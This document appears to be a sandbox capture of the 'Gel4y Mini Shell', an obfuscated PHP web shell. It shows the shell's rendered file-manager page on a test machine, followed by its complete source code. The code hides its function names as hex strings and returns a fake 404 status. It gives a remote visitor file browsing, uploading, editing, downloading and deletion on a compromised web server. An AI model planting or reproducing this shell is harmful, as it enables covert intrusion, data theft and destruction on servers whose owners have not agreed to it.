TRACE END [2023-02-13 02:13:31.396111]
<html lang="en"><head><style type="text/css">.swal-icon--error{border-color:#f27474;-webkit-animation:animateErrorIcon .5s;animation:animateErrorIcon .5s}.swal-icon--error__x-mark{position:relative;display:block;-webkit-animation:animateXMark .5s;animation:animateXMark .5s}.swal-icon--error__line{position:absolute;height:5px;width:47px;background-color:#f27474;display:block;top:37px;border-radius:2px}.swal-icon--error__line--left{-webkit-transform:rotate(45deg);transform:rotate(45deg);left:17px}.swal-icon--error__line--right{-webkit-transform:rotate(-45deg);transform:rotate(-45deg);right:16px}@-webkit-keyframes animateErrorIcon{0%{-webkit-transform:rotateX(100deg);transform:rotateX(100deg);opacity:0}to{-webkit-transform:rotateX(0deg);transform:rotateX(0deg);opacity:1}}@keyframes animateErrorIcon{0%{-webkit-transform:rotateX(100deg);transform:rotateX(100deg);opacity:0}to{-webkit-transform:rotateX(0deg);transform:rotateX(0deg);opacity:1}}@-webkit-keyframes animateXMark{0%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}50%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}80%{-webkit-transform:scale(1.15);transform:scale(1.15);margin-top:-6px}to{-webkit-transform:scale(1);transform:scale(1);margin-top:0;opacity:1}}@keyframes animateXMark{0%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}50%{-webkit-transform:scale(.4);transform:scale(.4);margin-top:26px;opacity:0}80%{-webkit-transform:scale(1.15);transform:scale(1.15);margin-top:-6px}to{-webkit-transform:scale(1);transform:scale(1);margin-top:0;opacity:1}}.swal-icon--warning{border-color:#f8bb86;-webkit-animation:pulseWarning .75s infinite alternate;animation:pulseWarning .75s infinite alternate}.swal-icon--warning__body{width:5px;height:47px;top:10px;border-radius:2px;margin-left:-2px}.swal-icon--warning__body,.swal-icon--warning__dot{position:absolute;left:50%;background-color:#f8bb86}.swal-icon--warning__dot{width:7px;height:7px;border-radius:50%;margin-left:-4px;bottom:-11px}@-webkit-keyframes pulseWarning{0%{border-color:#f8d486}to{border-color:#f8bb86}}@keyframes pulseWarning{0%{border-color:#f8d486}to{border-color:#f8bb86}}.swal-icon--success{border-color:#a5dc86}.swal-icon--success:after,.swal-icon--success:before{content:"";border-radius:50%;position:absolute;width:60px;height:120px;background:#fff;-webkit-transform:rotate(45deg);transform:rotate(45deg)}.swal-icon--success:before{border-radius:120px 0 0 120px;top:-7px;left:-33px;-webkit-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transform-origin:60px 60px;transform-origin:60px 60px}.swal-icon--success:after{border-radius:0 120px 120px 0;top:-11px;left:30px;-webkit-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transform-origin:0 60px;transform-origin:0 60px;-webkit-animation:rotatePlaceholder 4.25s ease-in;animation:rotatePlaceholder 4.25s ease-in}.swal-icon--success__ring{width:80px;height:80px;border:4px solid hsla(98,55%,69%,.2);border-radius:50%;box-sizing:content-box;position:absolute;left:-4px;top:-4px;z-index:2}.swal-icon--success__hide-corners{width:5px;height:90px;background-color:#fff;padding:1px;position:absolute;left:28px;top:8px;z-index:1;-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}.swal-icon--success__line{height:5px;background-color:#a5dc86;display:block;border-radius:2px;position:absolute;z-index:2}.swal-icon--success__line--tip{width:25px;left:14px;top:46px;-webkit-transform:rotate(45deg);transform:rotate(45deg);-webkit-animation:animateSuccessTip .75s;animation:animateSuccessTip .75s}.swal-icon--success__line--long{width:47px;right:8px;top:38px;-webkit-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-animation:animateSuccessLong .75s;animation:animateSuccessLong .75s}@-webkit-keyframes rotatePlaceholder{0%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}5%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}12%{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}to{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}}@keyframes rotatePlaceholder{0%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}5%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}12%{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}to{-webkit-transform:rotate(-405deg);transform:rotate(-405deg)}}@-webkit-keyframes animateSuccessTip{0%{width:0;left:1px;top:19px}54%{width:0;left:1px;top:19px}70%{width:50px;left:-8px;top:37px}84%{width:17px;left:21px;top:48px}to{width:25px;left:14px;top:45px}}@keyframes animateSuccessTip{0%{width:0;left:1px;top:19px}54%{width:0;left:1px;top:19px}70%{width:50px;left:-8px;top:37px}84%{width:17px;left:21px;top:48px}to{width:25px;left:14px;top:45px}}@-webkit-keyframes animateSuccessLong{0%{width:0;right:46px;top:54px}65%{width:0;right:46px;top:54px}84%{width:55px;right:0;top:35px}to{width:47px;right:8px;top:38px}}@keyframes animateSuccessLong{0%{width:0;right:46px;top:54px}65%{width:0;right:46px;top:54px}84%{width:55px;right:0;top:35px}to{width:47px;right:8px;top:38px}}.swal-icon--info{border-color:#c9dae1}.swal-icon--info:before{width:5px;height:29px;bottom:17px;border-radius:2px;margin-left:-2px}.swal-icon--info:after,.swal-icon--info:before{content:"";position:absolute;left:50%;background-color:#c9dae1}.swal-icon--info:after{width:7px;height:7px;border-radius:50%;margin-left:-3px;top:19px}.swal-icon{width:80px;height:80px;border-width:4px;border-style:solid;border-radius:50%;padding:0;position:relative;box-sizing:content-box;margin:20px auto}.swal-icon:first-child{margin-top:32px}.swal-icon--custom{width:auto;height:auto;max-width:100%;border:none;border-radius:0}.swal-icon img{max-width:100%;max-height:100%}.swal-title{color:rgba(0,0,0,.65);font-weight:600;text-transform:none;position:relative;display:block;padding:13px 16px;font-size:27px;line-height:normal;text-align:center;margin-bottom:0}.swal-title:first-child{margin-top:26px}.swal-title:not(:first-child){padding-bottom:0}.swal-title:not(:last-child){margin-bottom:13px}.swal-text{font-size:16px;position:relative;float:none;line-height:normal;vertical-align:top;text-align:left;display:inline-block;margin:0;padding:0 10px;font-weight:400;color:rgba(0,0,0,.64);max-width:calc(100% - 20px);overflow-wrap:break-word;box-sizing:border-box}.swal-text:first-child{margin-top:45px}.swal-text:last-child{margin-bottom:45px}.swal-footer{text-align:right;padding-top:13px;margin-top:13px;padding:13px 16px;border-radius:inherit;border-top-left-radius:0;border-top-right-radius:0}.swal-button-container{margin:5px;display:inline-block;position:relative}.swal-button{background-color:#7cd1f9;color:#fff;border:none;box-shadow:none;border-radius:5px;font-weight:600;font-size:14px;padding:10px 24px;margin:0;cursor:pointer}.swal-button:not([disabled]):hover{background-color:#78cbf2}.swal-button:active{background-color:#70bce0}.swal-button:focus{outline:none;box-shadow:0 0 0 1px #fff,0 0 0 3px rgba(43,114,165,.29)}.swal-button[disabled]{opacity:.5;cursor:default}.swal-button::-moz-focus-inner{border:0}.swal-button--cancel{color:#555;background-color:#efefef}.swal-button--cancel:not([disabled]):hover{background-color:#e8e8e8}.swal-button--cancel:active{background-color:#d7d7d7}.swal-button--cancel:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px rgba(116,136,150,.29)}.swal-button--danger{background-color:#e64942}.swal-button--danger:not([disabled]):hover{background-color:#df4740}.swal-button--danger:active{background-color:#cf423b}.swal-button--danger:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px rgba(165,43,43,.29)}.swal-content{padding:0 20px;margin-top:20px;font-size:medium}.swal-content:last-child{margin-bottom:20px}.swal-content__input,.swal-content__textarea{-webkit-appearance:none;background-color:#fff;border:none;font-size:14px;display:block;box-sizing:border-box;width:100%;border:1px solid rgba(0,0,0,.14);padding:10px 13px;border-radius:2px;transition:border-color .2s}.swal-content__input:focus,.swal-content__textarea:focus{outline:none;border-color:#6db8ff}.swal-content__textarea{resize:vertical}.swal-button--loading{color:transparent}.swal-button--loading~.swal-button__loader{opacity:1}.swal-button__loader{position:absolute;height:auto;width:43px;z-index:2;left:50%;top:50%;-webkit-transform:translateX(-50%) translateY(-50%);transform:translateX(-50%) translateY(-50%);text-align:center;pointer-events:none;opacity:0}.swal-button__loader div{display:inline-block;float:none;vertical-align:baseline;width:9px;height:9px;padding:0;border:none;margin:2px;opacity:.4;border-radius:7px;background-color:hsla(0,0%,100%,.9);transition:background .2s;-webkit-animation:swal-loading-anim 1s infinite;animation:swal-loading-anim 1s infinite}.swal-button__loader div:nth-child(3n+2){-webkit-animation-delay:.15s;animation-delay:.15s}.swal-button__loader div:nth-child(3n+3){-webkit-animation-delay:.3s;animation-delay:.3s}@-webkit-keyframes swal-loading-anim{0%{opacity:.4}20%{opacity:.4}50%{opacity:1}to{opacity:.4}}@keyframes swal-loading-anim{0%{opacity:.4}20%{opacity:.4}50%{opacity:1}to{opacity:.4}}.swal-overlay{position:fixed;top:0;bottom:0;left:0;right:0;text-align:center;font-size:0;overflow-y:auto;background-color:rgba(0,0,0,.4);z-index:10000;pointer-events:none;opacity:0;transition:opacity .3s}.swal-overlay:before{content:" ";display:inline-block;vertical-align:middle;height:100%}.swal-overlay--show-modal{opacity:1;pointer-events:auto}.swal-overlay--show-modal .swal-modal{opacity:1;pointer-events:auto;box-sizing:border-box;-webkit-animation:showSweetAlert .3s;animation:showSweetAlert .3s;will-change:transform}.swal-modal{width:478px;opacity:0;pointer-events:none;background-color:#fff;text-align:center;border-radius:5px;position:static;margin:20px auto;display:inline-block;vertical-align:middle;-webkit-transform:scale(1);transform:scale(1);-webkit-transform-origin:50% 50%;transform-origin:50% 50%;z-index:10001;transition:opacity .2s,-webkit-transform .3s;transition:transform .3s,opacity .2s;transition:transform .3s,opacity .2s,-webkit-transform .3s}@media (max-width:500px){.swal-modal{width:calc(100% - 20px)}}@-webkit-keyframes showSweetAlert{0%{-webkit-transform:scale(1);transform:scale(1)}1%{-webkit-transform:scale(.5);transform:scale(.5)}45%{-webkit-transform:scale(1.05);transform:scale(1.05)}80%{-webkit-transform:scale(.95);transform:scale(.95)}to{-webkit-transform:scale(1);transform:scale(1)}}@keyframes showSweetAlert{0%{-webkit-transform:scale(1);transform:scale(1)}1%{-webkit-transform:scale(.5);transform:scale(.5)}45%{-webkit-transform:scale(1.05);transform:scale(1.05)}80%{-webkit-transform:scale(.95);transform:scale(.95)}to{-webkit-transform:scale(1);transform:scale(1)}}</style><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title>Gel4y Mini Shell</title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?">Gel4y Mini Shell</a></h3></div><div><span>PHP Version : 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</span> <br><a href="?p=2f7661722f7777772f68746d6c&a=6e657746696c65">+File</a><a href="?p=2f7661722f7777772f68746d6c&a=6e6577446972">+Directory</a></div></div><div class="border-top table-responsive"><li>Uname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</li></div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple=""><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form>
</div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
<a href="?p=2f">~</a>/<a href="?p=2f766172">var</a>/<a href="?p=2f7661722f777777">www</a>/<a href="?p=2f7661722f7777772f68746d6c">html</a>/</div></div><article class="bg-dark border table-responsive mt-2">
<table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
<tr><td><a href="?p=2f7661722f7777772f68746d6c&a=76696577&n=62656e6572692e73655f6d616c776172655f616e616c79736973" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Latest modify on 2023-02-12 23:12"><i class="fa fa-fw fa-file"></i> beneri.se_malware_analysis</a></td><td>0KB</td><td><font color="">-rw-r--r--</font></td><td><div class="d-flex justify-content-between"><a href="?p=2f7661722f7777772f68746d6c&a=65646974&n=62656e6572692e73655f6d616c776172655f616e616c79736973" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Edit"><i class="fa fa-fw fa-edit"></i></a><a href="?p=2f7661722f7777772f68746d6c&a=72656e616d65&n=62656e6572692e73655f6d616c776172655f616e616c79736973&t=f" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Rename"><i class="fa fa-fw fa-pencil"></i></a><a href="?p=2f7661722f7777772f68746d6c&n=62656e6572692e73655f6d616c776172655f616e616c79736973&download" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Download"><i class="fa fa-fw fa-download"></i></a><a href="?p=2f7661722f7777772f68746d6c&a=64656c657465&n=62656e6572692e73655f6d616c776172655f616e616c79736973" class="delete" data-type="file" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Delete"><i class="fa fa-fw fa-trash"></i></a></div></td></tr><tr><td><a href="?p=2f7661722f7777772f68746d6c&a=76696577&n=7368656c6c2e706870" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Latest modify on 2023-02-12 23:12"><i class="fa fa-fw fa-file"></i> shell.php</a></td><td>12.104KB</td><td><font color="">-rw-rw-r--</font></td><td><div class="d-flex justify-content-between"><a href="?p=2f7661722f7777772f68746d6c&a=65646974&n=7368656c6c2e706870" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Edit"><i class="fa fa-fw fa-edit"></i></a><a href="?p=2f7661722f7777772f68746d6c&a=72656e616d65&n=7368656c6c2e706870&t=f" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Rename"><i class="fa fa-fw fa-pencil"></i></a><a href="?p=2f7661722f7777772f68746d6c&n=7368656c6c2e706870&download" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Download"><i class="fa fa-fw fa-download"></i></a><a href="?p=2f7661722f7777772f68746d6c&a=64656c657465&n=7368656c6c2e706870" class="delete" data-type="file" data-toggle="tooltip" data-placement="auto" title="" data-original-title="Delete"><i class="fa fa-fw fa-trash"></i></a></div></td></tr></tbody></table>
</article><div class="bg-dark border text-center mt-2"><small>Copyright © 2021 - Powered By Indonesian Darknet</small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js"></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>
<?php
error_reporting(0);
http_response_code(404);
define("self", "G\x65l\64y M\x69n\x69 Sh\x65ll");
$scD = "s\x63\x61\x6e\x64\x69r";
$fc = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65");
for ($i = 0; $i < count($fc); $i++) {
$fc[$i] = nhx($fc[$i]);
}
if (isset($_GET["p"])) {
$p = nhx($_GET["p"]);
$fc[3](nhx($_GET["p"]));
} else {
$p = $fc[2]();
}
function hex($str) {
$r = "";
for ($i = 0; $i < strlen($str); $i++) {
$r .= dechex(ord($str[$i]));
}
return $r;
}
function nhx($str) {
$r = "";
$len = (strlen($str) -1);
for ($i = 0; $i < $len; $i += 2) {
$r .= chr(hexdec($str[$i].$str[$i+1]));
}
return $r;
}
function perms($f) {
$p = fileperms($f);
if (($p & 0xC000) == 0xC000) {
$i = 's';
} elseif (($p & 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function a($msg, $sts = 1, $loc = "") {
global $p;
$status = (($sts == 1) ? "success" : "error");
echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>";
}
function deldir($d) {
global $fc;
if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
if ($fc[6]($d)) {
array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
rmdir($d);
} else {
unlink($d);
}
}
?>
<!doctype html>
<!-- RandsX aka T1kus_g0t -->
<html lang="en"><head><meta name="theme-color" content="red"><meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"><title><?= self ?></title><style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style><script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script></head><body style="background-color:#000;color:#fff;font-family:serif;"><div class="bg-dark table-responsive text-light border"><div class="d-flex justify-content-between p-1"><div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div><div><span>PHP Version : <?= $fc[1]() ?></span> <br><a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a><a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a></div></div><div class="border-top table-responsive"><li>Uname : <?= $fc[0]() ?></li></div><form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form>
<?php
if (isset($_FILES["f"])) {
$n = $_FILES["f"]["name"];
for ($i = 0; $i < count($n); $i++) {
if ($fc[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) {
a("file uploaded successfully");
} else {
a("file failed to upload", 0);
}
}
}
if (isset($_GET["download"])) {
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: Binary");
header("Content-Length: ".$fc[17](nhx($_GET["n"])));
header("Content-disposition: attachment; filename=\"".nhx($_GET["n"])."\"");
}
?>
</div><div class="bg-dark border table-responsive mt-2"><div class="ml-2" style="font-size:18px;"><span>Path: </span>
<?php
$ps = $fc[4]("/(\\\|\/)/", $p);
foreach ($ps as $k => $v) {
if ($k == 0 && $v == "") {
echo "<a href=\"?p=2f\">~</a>/"; continue;
}
if ($v == "") continue;
echo "<a href=\"?p=";
for ($i = 0; $i <= $k; $i++) {
echo hex($ps[$i]);
if ($i != $k) echo "2f";
}
echo "\">{$v}</a>/";
}
?>
</div></div><article class="bg-dark border table-responsive mt-2">
<?php if (!isset($_GET["a"])): ?>
<table class="table table-hover table-borderless table-sm"><thead class="text-light"><tr><th>Name</th><th>Size</th><th>Permission</th><th>Action</th></tr></thead><tbody class="text-light">
<?php
$scD = $fc[5]($scD($p), [".", ".."]);
foreach ($scD as $d) {
if (!$fc[6]("$p/$d")) continue;
echo "<tr><td><a href=\"?p=".hex("$p/$d")."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$d"))."\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td><td>N/A</td><td><font color=\"".(($fc[8]("$p/$d")) ? "#00ff00" : (!$fc[9]("$p/$d") ? "red" : null))."\">".perms("$p/$d")."</font></td><td><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></td></tr>";
}
foreach ($scD as $f) {
if (!$fc[7]("$p/$f")) continue;
$sz = $fc[10]("$p/$f")/1024;
$sz = round($sz, 3);
$sz = ($sz > 1024) ? round($sz/1024, 2)."MB" : $sz."KB";
echo "<tr><td><a href=\"?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$fc[19]("Y-m-d H:i", $fc[20]("$p/$f"))."\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td><td>{$sz}</td><td><font color=\"".(($fc[8]("$p/$f")) ? "#00ff00" : (!$fc[9]("$p/$f") ? "red" : null))."\">".perms("$p/$f")."</font></td><td><div class=\"d-flex justify-content-between\"><a href=\"?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a><a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a><a href=\"?p=".hex($p)."&n=".hex($f)."&download"."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a><a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a></div></td></tr>";
}
?></tbody></table>
<?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?>
<div class="px-2 py-2">
<?php if ($a == "delete") {
$loc = $p.'/'.nhx($_GET["n"]);
if ($_GET["t"] == "d") {
deldir($loc);
if (!$fc[12]($loc)) {
a("folder deleted successfully");
} else {
a("failed to delete the folder", 0);
}
}
if ($_GET["t"] == "f") {
$loc = $p.'/'.nhx($_GET["n"]);
unlink($loc);
if (!$fc[12]($loc)) {
a("file deleted successfully");
} else {
a("file to delete the folder", 0);
}
}
}
?>
<?php if ($a == "newDir"): ?>
<h5 class="border p-1 mb-3">New folder</h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($fc[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?>
<h5 class="border p-1 mb-3">New file</h5>
<form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($fc[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?>
<h5 class="border p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5>
<form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?>
<h5 class="border p-1 mb-3">Edit file</h5>
<span>File name : <?= nhx($_GET["n"]) ?></span>
<form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form>
<?php ((isset($_POST["s"])) ? ($fc[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?>
<h5 class="border p-1 mb-3">View file</h5>
<span>File name : <?= nhx($_GET["n"]) ?></span>
<div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $fc[18]($fc[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><?php endif; ?></div><?php endif; ?></article><div class="bg-dark border text-center mt-2"><small>Copyright © 2021 - Powered By Indonesian Darknet</small></div><script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script><script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script><script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script></body></html>